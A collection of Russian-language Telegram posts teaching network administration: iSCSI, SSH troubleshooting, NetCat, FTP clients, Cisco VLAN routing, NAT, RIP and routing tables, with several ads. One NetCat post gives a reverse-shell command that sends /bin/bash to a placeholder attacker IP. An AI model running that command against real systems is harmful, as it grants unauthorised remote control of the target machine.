networkadm | Unsorted

Telegram-канал networkadm - Network Admin

11897

Обучающий канал по сетевому и системному администрированию. Сотрудничество: @dad_admin Биржа: https://telega.in/c/networkadm РКН: https://bit.ly/3C9TB1e

Subscribe to a channel

Network Admin

Настройка SAN на основе iSCSI

Для демонстрации настроим SAN-сеть с использованием iSCSI — популярного и доступного варианта, использующего обычную Ethernet-сеть для передачи блоков данных.

1. Установка iSCSI-таргета (хранилища) на сервере

На сервере с ОС Linux установим программное обеспечение для работы iSCSI-таргета:

sudo apt install tgt


Создадим новый iSCSI-таргет:

sudo nano /etc/tgt/conf.d/iscsi.conf


Добавим конфигурацию для хранения:

<target iqn.2024-02.example:storage>
backing-store /dev/sdb
initiator-address 192.168.1.100
</target>


Сохраняем и применяем настройки:

sudo systemctl restart tgt
sudo tgtadm --mode target --op show


2. Подключение iSCSI-инициатора на клиенте

На клиентском сервере установим iSCSI-инициатор:

sudo apt install open-iscsi


Запустим обнаружение iSCSI-таргетов в сети:

sudo iscsiadm -m discovery -t sendtargets -p 192.168.1.10


Подключаемся к хранилищу:

sudo iscsiadm -m node -T iqn.2024-02.example:storage -p 192.168.1.10 --login


После успешного подключения устройство появится в системе как /dev/sdX, и его можно использовать как обычный диск.

N.A. ℹ️ BashTex

Читать полностью…

Network Admin

Что такое SAN и зачем он нужен?

Storage Area Network (SAN) — это высокоскоростная специализированная сеть, предназначенная для объединения серверов и устройств хранения данных. 


В отличие от традиционных NAS (Network Attached Storage), которые используют обычные сетевые соединения, SAN работает на более низком уровне и использует специализированные протоколы для быстрой и надежной передачи данных.

Чем SAN отличается от других систем хранения?

SAN позволяет серверам обращаться к хранилищу как к локальному диску, но с высокой масштабируемостью и отказоустойчивостью.

Основное отличие SAN от NAS в том, что SAN использует блочный доступ, а NAS — файловый.


NAS передает файлы через стандартные сетевые протоколы (NFS, SMB/CIFS), а SAN работает на уровне блоков через Fibre Channel (FC), iSCSI или NVMe-oF.
• В SAN данные передаются по выделенной сети, а в NAS они идут через обычную локальную сеть.
SAN быстрее и надежнее, но сложнее в настройке и дороже в реализации.

Основные компоненты SAN

SAN-сеть включает несколько ключевых элементов:
Серверы (инициаторы) — устройства, которые обращаются к хранилищу.
Сетевые коммутаторы — управляют трафиком между серверами и системами хранения.
Системы хранения данных (таргеты) — массивы дисков или SSD, к которым серверы получают доступ.
Протоколы — для взаимодействия могут использоваться Fibre Channel (FC), iSCSI, FCoE и NVMe-oF.

N.A. ℹ️ BashTex

Читать полностью…

Network Admin

Основные причины ошибки «SSH Connection Refused»

Продолжим разбор

5️⃣ Брандмауэр препятствует подключению

Брандмауэр может блокировать входящие соединения по порту SSH, что приводит к ошибке «Connection Refused». Чтобы проверить, разрешает ли брандмауэр подключение по SSH, используйте команду:

sudo ufw allow ssh


Эта команда позволит подключаться через SSH, если брандмауэр использует UFW (Uncomplicated Firewall).

6️⃣ Порт SSH закрыт

Если порт 22 закрыт на сервере, соединение будет отклонено. Чтобы проверить, прослушивает ли сервер порт 22, используйте команду:

sudo lsof -i:22


Если порт не прослушивается, откройте его с помощью iptables:

sudo iptables -A INPUT -p tcp --dport 22 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT


Этот набор команд позволит принимать подключения на порт 22.

7️⃣ Отладка SSH-соединения

Если вы продолжаете получать ошибку «Connection Refused», включите отладочный режим SSH. Это поможет выявить, что именно мешает подключению. Используйте команду:

ssh -v [server_ip]


Для более подробной отладки используйте:

ssh -vv [server_ip]


или

ssh -vvv [server_ip]


Эти команды покажут более подробную информацию, которая поможет выявить причину ошибки.

N.A. ℹ️ BashTex

Читать полностью…

Network Admin

IL vs. QUIC: два интересных, но не самых известных протокола

Когда речь заходит о сетевых протоколах, все сразу вспоминают TCP и UDP. Но в мире сетевых технологий есть множество менее известных, но всё же любопытных решений.

Давайте разберём два таких протокола: IL и QUIC. Они создавались для разных задач, но оба по-своему интересны.


IL — забытый протокол от Bell Labs

Протокол IL появился в системе Plan 9, которую разрабатывала Bell Labs как преемника UNIX.

В отличие от TCP, IL был проще, но при этом обеспечивал надёжную передачу данных. Он работал поверх IP и использовал подтверждения доставки, но без сложных механизмов управления перегрузкой.

Основное преимущество IL — низкие задержки и предсказуемое поведение. Он не пытался угадывать, насколько загружена сеть, а просто честно передавал данные и ждал подтверждения.

Это делало его удобным для небольших кластеров и систем с предсказуемой сетью, но не очень подходило для масштабных сетей с переменной загрузкой. 


В итоге IL так и остался нишевым решением, хотя его идеи повлияли на разработку других протоколов.

QUIC — новый игрок, который хочет заменить TCP

QUIC — это относительно молодой протокол, разработанный Google.

В отличие от IL, он не просто альтернатива TCP, а полноценный ответ на его недостатки. QUIC работает поверх UDP и сразу включает в себя функции, которые в TCP требуют дополнительных надстроек, например, шифрование и мультиплексирование потоков.

Одна из главных фишек QUIC — быстрая установка соединения. В TCP на это уходит несколько шагов, а в QUIC всё происходит за один-единственный обмен пакетами.

Это делает его идеальным для веб-сервисов, где каждая миллисекунда на счету.

Кроме того, QUIC более устойчив к потере пакетов, потому что один медленный поток не тормозит другие.


N.A. ℹ️ BashTex

Читать полностью…

Network Admin

ECN (Explicit Congestion Notification) — управляем перегрузкой сети

Когда сеть перегружена, маршрутизаторы обычно сбрасывают пакеты. Это заставляет протокол TCP снижать скорость передачи, но ведёт к потерям данных и необходимости их повторной отправки.

Такой механизм работает, но он неэффективен: задержки увеличиваются, а сеть используется нерационально.


Explicit Congestion Notification (ECN) предлагает альтернативный подход.

Вместо того чтобы сбрасывать пакеты, маршрутизатор просто помечает их специальным флагом в заголовке.

Получатель, обнаружив эту метку, сообщает отправителю, что сеть перегружена. В ответ отправитель снижает скорость передачи данных, предотвращая дальнейшую перегрузку.

Этот механизм позволяет избежать ненужных потерь и повторных передач. В отличие от традиционного TCP, который снижает скорость только после сброса пакетов, ECN работает на упреждение.

Это особенно полезно в высоконагруженных сетях, где даже небольшие потери могут вызывать значительные задержки.

ECN используется в современных дата-центрах, облачных сервисах и в приложениях, чувствительных к задержкам, таких как VoIP и онлайн-игры. 


Однако не все устройства и провайдеры поддерживают этот механизм. В некоторых случаях фаерволы и NAT могут блокировать пакеты с ECN, считая их подозрительными.

🔥 Несмотря на это, всё больше сетей начинают внедрять поддержку ECN, поскольку он помогает сделать интернет-соединения стабильнее и эффективнее.

Читать полностью…

Network Admin

Продвинутые возможности NetCat
Часть 2


4️⃣ Передача каталогов через tar

NetCat позволяет передавать целые каталоги, используя tar.

Пример: Передача папки my_folder:
На принимающей стороне:

$ nc -l 12345 | tar -xvf -


На отправляющей стороне:

$ tar -cvf - my_folder | nc <IP-адрес> 12345


5️⃣ Проброс портов

NetCat можно применять для проброса портов, что удобно при тестировании и отладке сетевых соединений.

Пример: Проброс трафика с порта 8080 на порт 9090:

$ nc -l 8080 | nc 127.0.0.1 9090


6️⃣ Постоянное соединение

Чтобы NetCat оставался активным даже после завершения сеанса, используйте бесконечный цикл:

$ while true; do nc -l 12345; done


7️⃣ Тестирование UDP и работа с multicast

NetCat поддерживает отправку UDP-пакетов, что позволяет тестировать многоадресную передачу.

Пример: Отправка данных в группу 224.0.0.1 через порт 5000:

$ echo "Test multicast" | nc -u 224.0.0.1 5000

Читать полностью…

Network Admin

Продвинутые возможности NetCat — Часть 1

1️⃣Перехват и анализ данных

NetCat можно использовать как простой сниффер для анализа данных, проходящих через сеть.

Пример: Прокси для перехвата HTTP-запросов:

$ nc -l 8080


Все запросы, отправленные на порт 8080, будут отображаться в консоли. Чтобы отправить запрос, подключите к этому порту браузер или curl:

$ curl -x http://<IP-адрес>:8080 http://example.com


2️⃣ Создание обратного шелла

NetCat может использоваться для создания обратного шелла для удалённого управления.

Пример: На атакующей стороне включается прослушивание:

$ nc -l -p 4444


На целевой машине устанавливается соединение с атакующим устройством:

$ nc <IP-адрес атакующего> 4444 -e /bin/bash


Теперь атакующая сторона получает доступ к терминалу целевой машины.

3️⃣ Передача файлов с компрессией

Для передачи файлов NetCat можно использовать совместно с gzip, чтобы сжимать данные.

Пример:
На принимающей стороне:

$ nc -l 12345 | gzip -d > file.txt


На отправляющей стороне:

$ gzip -c file.txt | nc <IP-адрес> 12345

Читать полностью…

Network Admin

Команда nc (NetCat): «Сетевой швейцарский армейский нож»

NetCat, или просто nc, — это мощная и универсальная утилита для работы с сетями. Её часто называют «сетевым швейцарским ножом» из-за множества задач, которые она может выполнять.

nc поддерживает работу с TCP, UDP и UNIX-сокетами, и её возможности делают её незаменимым инструментом для администраторов и специалистов по сетевой безопасности.

Что умеет NetCat?
• Устанавливать TCP-соединения.
• Прослушивать порты TCP и UDP.
• Сканировать порты (как одиночные, так и диапазоны).
• Выступать в роли простого TCP-прокси.
• Проверять доступность удалённых портов.
• Тестировать сетевые службы и демоны.
• Передавать файлы между компьютерами в связке с другими инструментами, например, pv.

Примеры использования:

1️⃣Сканирование портов
Чтобы просканировать несколько конкретных портов на сервере, используйте следующую команду:

$ nc -zv server2.merionet.lan 21 22 80 443 3000


Здесь:
• -z — не устанавливать соединение, а только проверить доступность порта.
• -v — выводить дополнительную информацию (режим verbose).

2️⃣ Сканирование диапазона портов
Для проверки диапазона портов, укажите его через дефис:

$ nc -zv server2.merionet.lan 20-90


3️⃣ Установка TCP-соединения
Открыть TCP-соединение с портом 5000 на удалённом сервере с использованием источника порта 3000 и тайм-аутом в 10 секунд:

$ nc -p 3000 -w 10 server2.merionet.lan 5000


Здесь:
• -p — исходный порт (3000).
• -w — время ожидания (10 секунд).

N.A.

Читать полностью…

Network Admin

🚀 На открытом вебинаре «Процессы в Linux» мы разберёмся, что такое процесс, чем он отличается от программы и научимся находить, анализировать и управлять процессами в вашей системе.

Это не просто урок — это первый шаг к освоению Linux на профессиональном уровне! Администраторы, разработчики, девопсы — мы готовим базу, которая станет фундаментом вашей карьеры в IT.

⭐ Спикер Андрей Буранов — системный администратор в VK, входит в топ-3 лучших преподавателей образовательных порталов.

Регистрируйтесь на открытый урок 28 января в 20:00 мск. Все участники вебинара получат скидку на обучение на курсе «Administrator Linux. Basic».

👉 Успейте занять своё место: https://otus.pw/KLg8G/?erid=2W5zFHkdyNG

Реклама. ООО "ОТУС ОНЛАЙН-ОБРАЗОВАНИЕ". ИНН 9705100963.

Читать полностью…

Network Admin

Топ-5 лучших FTP-клиентов для Linux.
Часть 2


4️⃣ cbftp

cbftp — клиент для работы с FTP/FXP, предназначенный для передачи больших файлов. Поддерживает полу-графический интерфейс с помощью ncurses.

Особенности:
• Шифрование данных с использованием AES-256.
• Интерактивные команды для управления передачей файлов.
• Встроенный просмотрщик файлов.
• Удобное управление задачами.

Установка:
Для установки потребуется скачать исходный код с GitHub и собрать программу:

git clone <репозиторий_с_программой>
cd cbftp
make
./cbftp


5️⃣ Yafc

Yafc — это FTP-клиент с открытым исходным кодом, ориентированный на замену стандартного FTP-клиента.

Особенности:
• Рекурсивные команды (например, ls, rm).
• Поддержка очередей задач.
• Встроенное автозавершение команд.
• Совместимость с SSH2 и прокси.

Установка:

sudo apt install yafc     # Для Debian/Ubuntu  
sudo yum install yafc # Для CentOS/RHEL
sudo dnf install yafc # Для Fedora


Пример использования:

yafc <адрес_сервера>
get <файл> # Скачивание файла.
put <файл> # Загрузка файла.
queue start # Запуск очереди задач.
bye # Завершение сеанса.


N.A.

Читать полностью…

Network Admin

Топ-5 лучших FTP-клиентов для Linux

Протокол передачи файлов (FTP) — старейший способ обмена файлами между клиентом и сервером. 


Несмотря на возраст, FTP до сих пор широко используется, а командная строка остаётся фаворитом для администраторов и опытных пользователей благодаря её скорости и гибкости.

В этом посте собраны лучшие FTP-клиенты для Linux, работающие через CLI (Command-Line Interface).

1️⃣Встроенный FTP-клиент

Каждая Linux-система имеет предустановленный FTP-клиент. Для его запуска достаточно ввести ftp в терминале.

Основные возможности:
• Подключение к FTP-серверу (анонимное или с учетными данными).
• Загрузка и скачивание файлов.
• Просмотр содержимого серверных директорий.

Пример использования:

ftp <адрес_сервера>
get <файл> # Скачивание файла.
put <файл> # Загрузка файла.
bye # Завершение сеанса.


2️⃣ LFTP

LFTP — это мощный инструмент для работы с различными протоколами передачи данных: FTP, sFTP, HTTP, fish, torrent и другими.

Особенности:
• Параллельная передача файлов.
• Поддержка закладок и очередей задач.
• Возможность зеркалирования директорий.
• Гибкое управление заданиями.

Установка:

sudo apt install lftp     # Для Debian/Ubuntu  
sudo yum install lftp # Для CentOS/RHEL
sudo dnf install lftp # Для Fedora


Пример использования:

lftp <адрес_сервера>
mirror -R # Загрузка содержимого папки на сервер.
mirror # Скачивание содержимого папки с сервера.
exit # Выход из программы.


3️⃣ NcFTP

NcFTP — одна из первых альтернатив стандартному FTP. Этот клиент предлагает более удобный интерфейс и расширенный функционал.

Особенности:
• Автоматическое возобновление загрузок.
• Завершение ввода команд (автокомплит).
• Поддержка фоновых задач.
• Интеграция с инструментами ncftpput и ncftpget.

Установка:

sudo apt install ncftp     # Для Debian/Ubuntu  
sudo yum install ncftp # Для CentOS/RHEL
sudo dnf install ncftp # Для Fedora


Пример использования:

ncftp <адрес_сервера>
get <файл> # Скачивание файла.
put <файл> # Загрузка файла.
quit # Завершение работы.


N.A.

Читать полностью…

Network Admin

Введение в Router-on-a-Stick и настройка коммутатора

Router-on-a-Stick (роутер на палочке) — это схема подключения маршрутизатора и коммутатора с использованием одного физического интерфейса, настроенного как транк с инкапсуляцией 802.1Q.

Такой подход позволяет маршрутизатору выполнять маршрутизацию между VLAN (Inter-VLAN Routing), передавая пакеты между разными сегментами сети. 


Этот метод особенно полезен, если в сети используется коммутатор уровня 2, который сам не способен маршрутизировать трафик.

Пример использования:
В корпоративных сетях Router-on-a-Stick часто применяют в сценариях VoIP, где голосовой и данные трафик изолированы в разных VLAN для повышения производительности и стабильности.

Настройка коммутатора

1. Создание VLAN
На коммутаторе создаются VLAN для разделения сетей:


Switch# configure terminal
Switch(config)# vlan 2
Switch(config-vlan)# name voice
Switch(config-vlan)# exit


2. Настройка интерфейсов VLAN с IP-адресами
Эти IP-адреса будут использоваться для управления VLAN:


Switch(config)# interface vlan 1
Switch(config-if)# ip address 192.168.10.2 255.255.255.0
Switch(config-if)# exit
Switch(config)# interface vlan 2
Switch(config-if)# ip address 192.168.20.2 255.255.255.0
Switch(config-if)# exit


3. Создание транка на порту GigabitEthernet 0/1
Транк позволяет передавать трафик всех VLAN через один физический интерфейс:


Switch(config)# interface gigabitethernet 0/1
Switch(config-if)# switchport trunk encapsulation dot1q
Switch(config-if)# switchport mode trunk
Switch(config-if)# spanning-tree portfast trunk


N.A.

Читать полностью…

Network Admin

Настройка NAT для сложных сценариев: доступ извне

В современных сетях NAT (Network Address Translation) применяется не только для базовой трансляции адресов, но и для сложных сценариев, таких как настройка доступа к внутренним ресурсам извне, использование нескольких провайдеров, или интеграция с VPN.

В этом посте мы рассмотрим продвинутую настройку NAT на примере двух ключевых сценариев.


Доступ извне через NAT с использованием Static NAT и Port Forwarding

В этом примере сервер внутри локальной сети должен быть доступен извне по конкретному порту.

Например, веб-сервер (HTTP) с IP-адресом 192.168.1.100 должен быть доступен по порту 80 через публичный IP-адрес маршрутизатора.

Сетевая топология:
Внутренняя сеть: 192.168.1.0/24
IP-адрес веб-сервера: 192.168.1.100
Публичный IP-адрес маршрутизатора: 203.0.113.2

Шаги настройки:

1️⃣Объявление NAT-зон:

R1(config)# interface G0/0  
R1(config-if)# ip nat inside
R1(config)# interface G0/1
R1(config-if)# ip nat outside


2️⃣ Настройка Static NAT для веб-сервера:

R1(config)# ip nat inside source static tcp 192.168.1.100 80 203.0.113.2 80  


Этот пример настраивает трансляцию для входящих запросов по порту 80 к серверу с внутренним адресом 192.168.1.100.

3️⃣ Проверка настройки:

R1# show ip nat translations  
Pro Inside global Inside local Outside local Outside global
tcp 203.0.113.2:80 192.168.1.100:80 --- ---


N.A. ℹ️ Help

Читать полностью…

Network Admin

Применяем RIP на практике

Чтобы настроить RIPv2 на маршрутизаторе Cisco, сначала нужно войти в режим глобальной конфигурации. Для этого выполняется команда:

R1# configure terminal  


Далее необходимо включить RIP и выбрать его вторую версию:

R1(config)# router rip  
R1(config-router)# version 2


После этого администратор указывает, какие сети будут объявляться:

R1(config-router)# network 192.168.1.0  
R1(config-router)# network 10.0.0.0


Не забудьте сохранить конфигурацию с помощью команды:

R1# write memory  


Для проверки состояния маршрутов, изученных через RIP, используется команда:

R1# show ip route rip  


Результаты отображают маршруты с кодом R, что указывает на их получение через RIP:

R    10.1.1.0/24 [120/1] via 192.168.1.2, 00:00:15, FastEthernet0/0  


Преимущества и ограничения RIP

Одно из главных преимуществ RIP — простота настройки и управления. Этот протокол идеально подходит для небольших и средних сетей, где нет сложной топологии.

Однако у RIP есть и свои ограничения. Протокол поддерживает маршруты с максимальным числом хопов до 15, что делает его неприменимым в крупных сетях. 


Также он имеет сравнительно медленную сходимость при изменении топологии, что может вызвать временные проблемы в маршрутизации.

Когда использовать RIP?

RIP лучше всего подходит для небольших организаций или лабораторных стендов, где требуется простой и надежный протокол маршрутизации.

В более сложных и крупных сетях рекомендуется использовать современные протоколы, такие как OSPF или EIGRP.

N.A. ℹ️ Help

Читать полностью…

Network Admin

Введение в таблицу маршрутизации IPv4

Для сетевых администраторов понимание таблицы маршрутизации IPv4 является ключевым навыком. 


В посте мы разберем, как интерпретировать данные из таблицы маршрутизации и что означают различные типы маршрутов.

Сценарий сети

На рисунке представлена сеть, где маршрутизатор R2 подключен к Интернету. Для связи с ним администратор настроил на R1 статический маршрут, который перенаправляет пакеты через R2, если в таблице маршрутизации отсутствует запись для IP-адреса назначения.

R1 и R2 также используют OSPF для обмена информацией о своих подключенных сетях.

Подключения:
PC1 (192.168.10.10) подключен к сети 192.168.10.0/24 через интерфейс G0/0/0 маршрутизатора R1 (192.168.10.1).
R1 (209.165.200.225) подключен к R2 (209.165.200.226) через сеть 209.165.200.224/30.
R2 связан с сетью 10.1.1.0/24, к которой подключен PC2 (10.1.1.10).

Анализ таблицы маршрутизации

Команда show ip route позволяет просмотреть таблицу маршрутизации маршрутизатора Cisco IOS. Пример вывода команды для R1:

R1# show ip route  
Codes: L - local, C - connected, S - static, O - OSPF, D - EIGRP
Gateway of last resort is 209.165.200.226 to network 0.0.0.0
S* 0.0.0.0/0 [1/0] via 209.165.200.226, GigabitEthernet0/0/1
O 10.1.1.0 [110/2] via 209.165.200.226, 00:02:45, GigabitEthernet0/0/1
C 192.168.10.0/24 is directly connected, GigabitEthernet0/0/0
L 192.168.10.1/32 is directly connected, GigabitEthernet0/0/0
C 209.165.200.224/30 is directly connected, GigabitEthernet0/0/1
L 209.165.200.225/32 is directly connected, GigabitEthernet0/0/1


Объяснение кодов маршрутов:
L: Локальный IP-адрес интерфейса.
C: Прямо подключенная сеть.
S: Статический маршрут, настроенный администратором.
O: OSPF, динамически изученный маршрут.

Особенности маршрутов

1️⃣Прямое подключение:
Когда интерфейс маршрутизатора активен и настроен с IP-адресом, автоматически создаются маршруты с кодами C и L. В данном случае:
C: 192.168.10.0/24 (сеть PC1).
C: 209.165.200.224/30 (связь между R1 и R2).

2️⃣ OSPF:
Маршрут для сети 10.1.1.0/24 был автоматически изучен через OSPF от R2.

3️⃣ Маршрут по умолчанию (Default Route):
Сетевой адрес 0.0.0.0/0 указывает на шлюз последней надежды (next hop), через который передаются все пакеты, если нет точного совпадения в таблице маршрутизации.

N.A. ℹ️ Help

Читать полностью…

Network Admin

👩‍💻 Открытый урок «Инструменты и методы мониторинга серверов на платформе Windows Server»

🗓 10 февраля в 20:00 МСК
🆓 Бесплатно. Урок в рамках старта курса «Администратор Windows» от Otus.

На вебинаре вы узнаете:
✔️ Основные подходы к мониторингу серверов и выявлению проблем в инфраструктуре.
✔️ Как использовать встроенные инструменты Windows Server: Performance Monitor, Event Viewer и другие.
✔️ Обзор сторонних решений для мониторинга серверов и сети.
✔️ Практические рекомендации по настройке автоматического уведомления и отчетности.

🔗 Ссылка на регистрацию: https://otus.pw/5NMFh/

#реклама
О рекламодателе

Читать полностью…

Network Admin

Вышло большое обновление российской программы для мониторинга серверов и сетевого оборудования "10-Страйк Мониторинг Сети Pro" версия 8.0.

Теперь можно редактировать карту сети, используя Web-интерфейс. Это значит, что можно чаще обходиться без графической консоли, в том числе при работе под Linux. Добавлена новая реакция на события в виде запуска скрипта SSH. Также улучшена работа с движком Netflow: стало можно рисовать больше графиков и диаграмм по статистике трафика.

Основные функции программы:
- Опрашивает хосты в фоновом режиме
- Выполняет множество проверок по большинству сетевых протоколов
- Реагирует на события
- Отображает данные и статистику
- Поддерживает распределенный мониторинг и Web-интерфейс

Продукт включён в реестр Минцифры. Получен сертификат совместимости с РЕД ОС.

📌Узнать больше и посмотреть видео о программе:
https://vk.cc/cI9eX3

На сайте вы также найдете другие программы: для учета ПК и железа, для администрирования.

Реклама. ИП Степанов Д.Ю. ИНН 732806262853

Читать полностью…

Network Admin

Наткнулись на промо новой облачной конференции. Пошли подробнее узнавать, кто её организует — оказалось, это создатель первого в России публичного облака собственной разработки.

У ребят планируется много технических докладов: от обзоров новых типов сетевых дисков до приоритетов бизнеса в области ИТ — звучит интересно.

Подробнее можете посмотреть тут

Читать полностью…

Network Admin

Если хочется не сидеть на месте, а активнее изучать то, как строятся стабильные, и что важно, безопасные сети, этот курс — лучший старт. Он охватывает вообще всё, что нужно для понимания всех основ коммутирования и маршрутизации.

В курсе тебя ждут 100 тестов для закрепления теории, 20 лабораторных работ для практики и даже один проект, который позволит применить полученные знания прямо в реальных условиях. И да, все это основано на Cisco CCNA.

А если вдруг возникнут вопросы — не переживай! Круглосуточная поддержка всегда рядом.

Ссылка на курс тут: https://stepik.org/a/227855

Группа с поддержкой, если возникнут трудности: /channel/Networks_anyone

Читать полностью…

Network Admin

ECMP (Equal-Cost Multi-Path): как интернет выбирает лучший путь

В обычной маршрутизации пакеты данных идут по одному заранее выбранному маршруту.

Но что, если у маршрутизатора есть несколько равнозначных путей до пункта назначения? 


В таком случае используется ECMP (Equal-Cost Multi-Path Routing) — механизм, который позволяет передавать трафик по нескольким маршрутам одновременно.

Как это работает?

Маршрутизатор проверяет таблицу маршрутизации и видит, что до нужного узла есть несколько одинаково “дорогих” путей (например, с одинаковой метрикой в OSPF или одинаковым количеством хопов в BGP). Вместо выбора одного пути он:

Распределяет пакеты между всеми доступными маршрутами.
Использует хеширование заголовков пакетов, чтобы трафик одного соединения шёл по одному пути и не ломал TCP.
Позволяет увеличивать пропускную способность сети без добавления новых, более мощных устройств.

Где применяется ECMP?
• В магистральных сетях (повышает отказоустойчивость и балансирует нагрузку).
• В облачных и дата-центрах (ускоряет доступ к ресурсам).
• В SD-WAN и VPN (позволяет динамически использовать несколько каналов связи).

ECMP делает интернет более гибким и быстрым, а его работа остаётся незаметной для пользователей.

Читать полностью…

Network Admin

Selectel School — твой путь в IT 😎

Приглашаем тебя на Selectel School — бесплатный обучающий онлайн‑интенсив для тех, кто хочет работать в дата‑центре.

В курсе ты узнаешь об устройстве наших ЦОДов, освоишь сборку и обслуживание серверов, а также изучишь принципы настройки сетевого оборудования. Все это поможет тебе прокачать навыки инженера дата‑центра и стать сотрудником Selectel!

Активируй бота и проходи курс Selectel School: https://slc.tl/kwzhh

Реклама, АО «Селектел», ИНН: 7810962785, ERID: 2VtzqwCM58G

Читать полностью…

Network Admin

⚙️ Как писать красивые и безопасные bash скрипты

✔️Добавить в начало скрипта:

set -euxo pipefail


➡️ Что всё это значит:
▶️set -e - прекращает выполнение скрипта если команда завершилась ошибкой, выводит в stderr строку с ошибкой. Обойти эту проверку можно добавив в пайплайн к команде true: mycommand | true.

▶️set -u - прекращает выполнение скрипта, если встретилась несуществующая переменная.

▶️set -x - выводит выполняемые команды в stdout перед выполненинем.

▶️set -o pipefail - прекращает выполнение скрипта, даже если одна из частей пайпа завершилась ошибкой. В этом случае bash-скрипт завершит выполнение, если mycommand вернёт ошибку, не смотря на true в конце пайплайна: mycommand | true.

🖼️ Ссылка на источник

🔨 bash_help

Читать полностью…

Network Admin

Основные причины ошибки «SSH Connection Refused»

Ошибка «SSH Connection Refused» возникает, когда удаленный сервер отклоняет запрос на соединение.

Это может быть вызвано различными причинами, от отсутствия клиента или сервера SSH до неправильных настроек. Вот основные причины и их решения:

1️⃣SSH-клиент не установлен

Если на локальной машине отсутствует SSH-клиент, подключение к серверу невозможно. Проверьте, установлен ли SSH-клиент, командой:

ssh


Если команда не найдена, установите SSH-клиент:
Для Ubuntu/Debian:

sudo apt install openssh-client


Для CentOS/RHEL:

sudo yum install openssh-client


2️⃣ SSH-сервер не установлен на удаленном хосте

Чтобы принимать соединения, на сервере должен быть установлен SSH-демон. Проверьте это, выполнив команду:

ssh localhost


Если появляется сообщение «Connection refused», установите сервер OpenSSH:
Для Ubuntu/Debian:

sudo apt install openssh-server


Для CentOS/RHEL:

sudo yum install openssh-server


3️⃣ Неверные учетные данные или IP-адрес

Часто ошибка вызвана неправильным вводом имени пользователя, пароля или IP-адреса. Убедитесь, что данные верны, и проверьте, какой порт используется сервером:

grep Port /etc/ssh/sshd_config

4️⃣ Служба SSH не работает

Если служба SSH не запущена, сервер не сможет принимать соединения. Проверьте её статус:

sudo service ssh status


Если служба не активна, запустите её:

sudo systemctl start sshd
sudo systemctl enable sshd


N.A.

Читать полностью…

Network Admin

Роль VRF в сетях

Одним из важнейших аспектов применения VRF является упрощение сетевой инфраструктуры при обеспечении высокой безопасности и изоляции.

Это особенно актуально в многоклиентских средах, где каждый клиент может требовать отдельного, полностью изолированного виртуального пространства для своей сети.

Как работает VRF

Каждое виртуальное пространство в VRF имеет свои собственные таблицы маршрутизации. 


Это означает, что маршруты одного виртуального маршрутизатора не пересекаются с маршрутами другого, даже если они физически находятся на одном устройстве.

Это позволяет разным пользователям или отделам сети работать независимо, без риска вмешательства или пересечения данных между ними.

Интеграция с другими технологиями

VRF тесно интегрируется с другими сетевыми технологиями, такими как MPLS (Multiprotocol Label Switching). В связке с MPLS VRF помогает улучшить маршрутизацию и управление трафиком на уровне провайдера.

С помощью этой комбинации можно обеспечивать не только изоляцию, но и оптимизацию трафика между виртуальными сетями.


Применение VRF в облачных и многоклиентских средах

В облачных средах VRF позволяет сервис-провайдерам эффективно управлять трафиком различных клиентов, не прибегая к использованию отдельных физических маршрутизаторов.

Это снижает капитальные расходы и упрощает управление.

N.A. ℹ️ Help

Читать полностью…

Network Admin

Cloud или Bare Metal: где лучше запускать кластеры Kubernetes?
 
29 января в 12:00 Selectel проведет вебинар, на котором специалисты компании расскажут, как Managed Kubernetes на выделенных серверах поможет сократить расходы на IT-инфраструктуру до 40%, и покажут самые популярные и выгодные конфигурации серверов.
 
Также на вебинаре вы узнаете:
 
1️⃣Какие преимущества есть у Managed Kubernetes на выделенных серверах
2️⃣Для каких задач подойдет сервис Managed Kubernetes на Bare Metal
3️⃣Реальные кейсы запуска кластеров Kubernetes с воркер-нодами на выделенных серверах в Selectel
 
Регистрируйтесь на вебинар прямо сейчас

Реклама, АО «Селектел», ИНН: 7810962785, ERID: 2VtzqwTKR6K

Читать полностью…

Network Admin

Настройка маршрутизатора для Inter-VLAN Routing

На маршрутизаторе для каждого VLAN создаются под-интерфейсы (sub-interfaces), которые обрабатывают трафик между VLAN через транк.

1️⃣Подготовка физического интерфейса
Отключаем IP-адрес на основном интерфейсе, чтобы использовать его для под-интерфейсов:

Router# configure terminal
Router(config)# interface gigabitethernet 0/1
Router(config-if)# no ip address
Router(config-if)# duplex auto
Router(config-if)# speed auto


2️⃣ Создание под-интерфейсов для VLAN
Каждому VLAN соответствует отдельный под-интерфейс:

Router(config)# interface gigabitethernet 0/1.1
Router(config-subif)# encapsulation dot1q 1 native
Router(config-subif)# ip address 192.168.10.1 255.255.255.0

Router(config)# interface gigabitethernet 0/1.2
Router(config-subif)# encapsulation dot1q 2
Router(config-subif)# ip address 192.168.20.1 255.255.255.0


encapsulation dot1q 1 native — указывает, что VLAN 1 является нативным (по умолчанию).
encapsulation dot1q 2 — настраивает под-интерфейс для VLAN 2.

3️⃣ Проверка настройки
Для проверки конфигурации используйте команды:

Router# show vlans
Router# show ip route


В выводе команды show ip route должны отображаться созданные под-интерфейсы, а трафик между VLAN начнет маршрутизироваться через маршрутизатор.

Читать полностью…

Network Admin

Резервирование канала с использованием Policy-Based NAT

Когда сеть подключена к двум интернет-провайдерам, NAT можно настроить так, чтобы определённый трафик (например, рабочие станции или видеоконференции) шёл через одного провайдера, а всё остальное — через другого.

Сетевая топология:
Локальная сеть: 192.168.10.0/24
Первичный провайдер: 203.0.113.0/30 (интерфейс G0/0)
Резервный провайдер: 198.51.100.0/30 (интерфейс G0/1)

Шаги настройки:

1️⃣Объявление зон NAT:

R1(config)# interface G0/0  
R1(config-if)# ip nat outside
R1(config)# interface G0/1
R1(config-if)# ip nat outside
R1(config)# interface G0/2
R1(config-if)# ip nat inside


2️⃣ Настройка двух пулов NAT:

R1(config)# ip nat pool PROVIDER1 203.0.113.2 203.0.113.2 netmask 255.255.255.252  
R1(config)# ip nat pool PROVIDER2 198.51.100.2 198.51.100.2 netmask 255.255.255.252


3️⃣ Создание списков доступа для разделения трафика:

R1(config)# access-list 1 permit 192.168.10.0 0.0.0.255  
R1(config)# access-list 2 permit 192.168.20.0 0.0.0.255


4️⃣ Настройка Policy-Based NAT:

R1(config)# ip nat inside source list 1 pool PROVIDER1 overload  
R1(config)# ip nat inside source list 2 pool PROVIDER2 overload


5️⃣ Проверка трансляции:

R1# show ip nat statistics  
Total active translations: 5 (2 static, 3 dynamic)
Outside interfaces: G0/0, G0/1
Inside interfaces: G0/2


Особенности и ограничения продвинутого NAT

Статический NAT: Идеально подходит для доступа к критически важным ресурсам, но требует ручной настройки для каждого ресурса.
